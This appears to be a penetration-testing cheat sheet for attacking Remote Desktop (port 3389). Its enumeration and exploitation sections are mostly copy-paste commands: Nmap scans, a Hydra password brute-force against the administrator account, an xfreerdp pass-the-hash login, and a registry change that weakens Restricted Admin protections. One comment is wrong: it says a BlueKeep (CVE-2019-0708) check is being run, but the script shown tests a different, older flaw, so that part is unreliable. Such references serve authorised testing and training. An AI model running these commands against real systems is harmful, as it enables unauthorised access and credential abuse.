RDP - 3389

The Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft that allows users to connect to and control a remote computer over a network. It provides a graphical interface to the user for managing remote systems as if they were sitting in front of them.

Default port: 3389

Enumeration

# Nmap service/version detection for RDP
nmap -p 3389 -sV --script=rdp-ntlm-info,rdp-enum-encryption 10.10.10.10

# Check if RDP is vulnerable to CVE-2019-0708 (BlueKeep)
nmap -p 3389 --script=rdp-vuln-ms12-020 10.10.10.10

# Enum RDP cert details
openssl s_client -connect 10.10.10.10:3389

Exploitation

# Attempt brute-force with Hydra
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10

# Connect using xfreerdp (Linux client)
xfreerdp /v:10.10.10.10 /u:administrator /p:'password' /cert:ignore
# Note: /pth:<HASH> can be used for pass the hash attack.

# If PTH didn't work, use following command to enable DisableRestrictedAdmin:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Enumeration​

Exploitation​

Enumeration

Exploitation